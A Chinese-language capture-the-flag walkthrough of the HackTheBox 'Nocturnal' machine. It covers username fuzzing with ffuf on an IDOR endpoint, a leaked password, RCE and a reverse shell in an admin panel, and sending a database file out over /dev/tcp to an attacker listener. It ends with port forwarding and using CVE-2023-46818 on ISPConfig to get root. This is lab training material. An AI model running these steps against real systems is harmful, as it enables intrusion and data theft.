HTB-Nocturnal

First Post:

Last Update:

先使用nmap扫ip,得到22和80两个端口(虽然没什么用),然后改hosts文件,将域名和ip绑定

1
echo "address=/nocturnal.htb/10.10.11.64" | sudo tee -a /etc/dnsmasq.conf
  • echo:输出要添加的内容。
  • tee -a:以管理员权限追加到 /etc/hosts(避免覆盖原有内容)。

接着访问域名进入网页,注册登录,是个上传文件的网页,上传文件得到下载链接,

1
http://nocturnal.htb/view.php?username=111&file=a.pdf

然后使用fuff爆有效用户名

1
ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=a.pdf' -w /home/Desktop/htb/user.txt -H 'Cookie: PHPSESSID=k381a2of6lftuk6gnab5f5sapa'  -fs 2985
参数 作用
-u 目标URL,其中 FUZZ 是占位符,表示要爆破的变量位置。
-w 指定字典文件路径(这里是 user.txt,用于替换 FUZZ)。
-H 添加HTTP请求头(此处传递了一个Cookie,可能是维持会话所必需)。
-fs 2985 过滤掉响应大小为2985字节的结果(通常用于排除无效响应)。 
1
2
3
4
5
root                  [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 644ms]
admin                 [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 683ms]
1                     [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration:1548ms]
amanda                [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 675ms]
tobias                [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 685ms]

将下载链接中username=111替换为username=amanda(其他不行),得到privacy.odt,是word文件,找到password,接着登录amanda,左上角链接进入admin后台,点击admin.php发现有任意rce(看wp发现的),使用shell文件反弹,其他反弹试了不行,接着找到.db数据库文件,下载到kali

1
2
3
4
www-data@nocturnal:~/nocturnal_database$ cat nocturnal_database.db > /dev/tcp/10.xx.xx.xx/8888

[root@kali] /home/kali/Nocturnal  
❯ nc -lvnp 8888 > nocturnal_database.db

得到了 账号密码,第一个flag,切换用户后,目录下有.txt就是flag,密码是md5加密后的,

1
su tobias

输入ps -auxnetstat -tuln收集信息,发现靶机8080端口存在

在kali输入ssh -L 9000:127.0.0.1:8080 tobias@10.10.11.64讲8080端口页面转发到本地,查看页面
发现是一个ispconfig页面,查看源代码,可以得知版本号应该为v3.2

搜索一下ispconfig 3.2 exploit,发现存在CVE-2023-46818可以利用,但是该漏洞利用需要能登录的用户名和密码,只能尝试密码复用
将exploit下载到本地并执行,发现成功执行并获取到root权限,到此便已经通关该靶场